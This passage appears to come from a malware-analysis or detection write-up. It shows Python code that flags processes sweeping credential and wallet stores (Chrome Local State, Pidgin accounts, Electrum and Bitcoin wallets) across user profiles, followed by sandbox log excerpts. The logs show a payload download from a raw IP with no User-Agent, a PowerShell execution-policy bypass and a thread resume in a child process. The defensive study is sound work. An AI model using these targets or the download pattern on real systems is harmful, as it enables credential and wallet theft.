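    "pidgin_accounts": re.compile(r"\\\.purple\\accounts\.xml$", re.I),
    "chrome_local_state": re.compile(r"\\Google\\Chrome\\User Data\\Local State$", re.I),
    "electrum_wallets": re.compile(r"\\Electrum\\wallets$", re.I),
    "bitcoin_wallet_dat": re.compile(r"\\wallet\.dat$", re.I),
}
_PROFILE = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)\\", re.I)


def classify(path: str):
    """Return the category label for a path, or None if it is not a known store."""
    for name, rx in CATEGORIES.items():
        if rx.search(path):
            return name
    return None


def profile_of(path: str):
    """User-profile directory name under C:\\Users, or None for paths outside it."""
    m = _PROFILE.match(path)
    return m.group(1) if m else None


def summarize(paths, min_profiles: int = 3) -> dict:
    """Group touched stores by category and profile; a category probed under
    at least `min_profiles` distinct profiles is reported as a sweep."""
    by_cat = defaultdict(set)
    for p in paths:
        cat = classify(p)
        if cat:
            by_cat[cat].add(profile_of(p) or "<no profile>")
    swept = sorted(c for c, profiles in by_cat.items() if len(profiles) >= min_profiles)
    return {"categories": {c: sorted(v) for c, v in by_cat.items()}, "profile_sweep": swept}


if __name__ == "__main__":
    print(summarize(SAMPLE_FILE_EVENTS))
```

Default, Default User, Public and All Users are never interactive profiles, so a single process reading the same store under three or more of them is far more specific than any one path on its own; that is why the sweep count, not the category hit, is the alertable field.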
Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
send | buffer: GET /po/tai1.exe HTTP/1.1 / Host: 23.92.213.108 / Connection: Keep-Alive, socket: 1260, sent: 74 | 1 | 74 | 0

The 74 bytes sent are exactly the request line, the Host and Connection headers and the terminating blank line with CRLF endings, so the download request carried no User-Agent at all; that is the "GET method with no useragent header" feature flagged above.

parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe

Process injection: Process 7748 resumed a thread in remote process 7232

Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
NtResumeThread | thread_handle: 0x000000000000006c, suspend_count: 0, process_identifier: 7232 | 1 | 0 | 0

7748 is also one of the processes terminated with status 0xffffffff above. A parent resuming the initial thread of a child it created suspended produces the same log line as process hollowing; this report shows no memory write or section mapping into 7232, so the entry on its own does not establish injection.
option -executionpolicy bypass value Attempts to bypass execution policy (reported twice)
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe